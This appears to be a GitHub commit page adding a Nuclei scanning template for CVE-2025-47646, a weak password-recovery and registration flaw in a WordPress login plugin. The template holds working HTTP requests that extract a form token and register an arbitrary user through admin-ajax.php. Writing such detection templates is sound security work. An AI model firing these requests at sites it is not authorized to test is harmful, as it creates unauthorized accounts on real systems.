Skip to content

Commit b07ca4e

Browse files
Merge pull request #12415 from projectdiscovery/pussycat0x-patch-4
Create CVE-2025-47646.yaml
2 parents f6d5ffb + 5e9f803 commit b07ca4e

1 file changed

Lines changed: 72 additions & 0 deletions

File tree

http/cves/2025/CVE-2025-47646.yaml

Lines changed: 72 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,72 @@
1+
id: CVE-2025-47646
2+
3+
info:
4+
name: PSW Front-end Login & Registration 1.13 - Weak Password Recovery
5+
author: pussycat0x
6+
severity: critical
7+
description: |
8+
PSW Front-end Login & Registration plugin for WordPress contains a weak password recovery mechanism that can be exploited by unauthenticated attackers. This vulnerability affects versions through 1.13 and allows attackers to potentially gain unauthorized access.
9+
reference:
10+
- https://github.com/RootHarpy/CVE-2025-47646
11+
- https://github.com/Nxploited/CVE-2025-47646
12+
- https://patchstack.com/database/wordpress/plugin/psw-login-and-registration/vulnerability/wordpress-psw-front-end-login-registration-1-12-broken-authentication-vulnerability?_s_id=cve
13+
- https://github.com/PuddinCat/GithubRepoSpider
14+
- https://github.com/nomi-sec/PoC-in-GitHub
15+
classification:
16+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
17+
cvss-score: 9.8
18+
cve-id: CVE-2025-47646
19+
cwe-id: CWE-640
20+
epss-score: 0.00019
21+
epss-percentile: 0.03401
22+
tags: cve,cve2025,wordpress,wp-plugin,psw,intrusive
23+
24+
variables:
25+
username: "{{randstr}}"
26+
password: "{{randstr}}"
27+
email: "{{randstr}}@{{rand_base(5)}}.com"
28+
29+
flow: http(1) && http(2)
30+
31+
http:
32+
- raw:
33+
- |
34+
GET /wp-login.php HTTP/1.1
35+
Host: {{Hostname}}
36+
37+
redirects: true
38+
matchers:
39+
- type: word
40+
part: body
41+
words:
42+
- "psw_registration"
43+
- "pswlogform"
44+
- "/wp-content/plugins/psw-login-and-registration"
45+
condition: and
46+
internal: true
47+
48+
extractors:
49+
- type: regex
50+
name: token
51+
group: 1
52+
regex:
53+
- 'name="pswforgetform" value="(.*?)"'
54+
internal: true
55+
56+
- raw:
57+
- |
58+
POST /wp-admin/admin-ajax.php HTTP/1.1
59+
Host: {{Hostname}}
60+
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
61+
X-Requested-With: XMLHttpRequest
62+
Origin: {{RootURL}}
63+
Referer: {{RootURL}}
64+
65+
first_name={{username}}&last_name={{username}}&new_user_name={{username}}&new_user_email={{email}}&new_user_password={{password}}&new_user_password_confirmation={{password}}&action=register_user_front_end&psw_form={{token}}
66+
67+
matchers:
68+
- type: dsl
69+
dsl:
70+
- 'contains_all(body, "{{username}}","activation link")'
71+
- 'status_code == 200'
72+
condition: and

0 commit comments

Comments
 (0)